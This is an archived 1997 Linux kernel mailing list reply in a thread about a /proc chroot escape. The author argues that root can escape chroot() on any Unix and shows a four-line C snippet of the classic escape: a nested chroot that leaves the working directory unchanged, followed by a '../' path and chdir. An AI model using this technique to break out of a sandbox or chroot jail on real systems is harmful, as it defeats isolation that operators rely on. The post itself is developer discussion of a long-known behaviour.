Re: Linux proc exploit

Miquel van Smoorenburg (miquels@cistron.nl)
26 Nov 1997 18:08:40 +0100

Messages sorted by: [ date ][ thread ][ subject ][ author ]
Next message: Myrdraal: "2.1.66 serial flakeyness?"
Previous message: Rik van Riel: "Re: fork: out of memory"
Maybe in reply to: D.P.Simpson@ecs.soton.ac.uk: "Linux proc exploit"
Next in thread: Rogier Wolff: "Re: Linux proc exploit"

In article <9063.9711261605@feynman.ecs.soton.ac.uk>,
<D.P.Simpson@ecs.soton.ac.uk> wrote:
>
>Linux has a vulnerability in the proc filing system: it can be used by root to escape from
>chroot() areas.

In every unix you can escape from chroot() areas. Check this out.

chroot("/somedir-in-chroot-area");
/* Note this *doesn't* change the working directory */
chroot("../../../../../../../..");
chdir("/");

Et voila

Mike.

-- 
 Miquel van Smoorenburg |  Studying to be a technomage   <*>
    miquels@cistron.nl  | "May you live in interesting times"

Next message: Myrdraal: "2.1.66 serial flakeyness?"
Previous message: Rik van Riel: "Re: fork: out of memory"
Maybe in reply to: D.P.Simpson@ecs.soton.ac.uk: "Linux proc exploit"
Next in thread: Rogier Wolff: "Re: Linux proc exploit"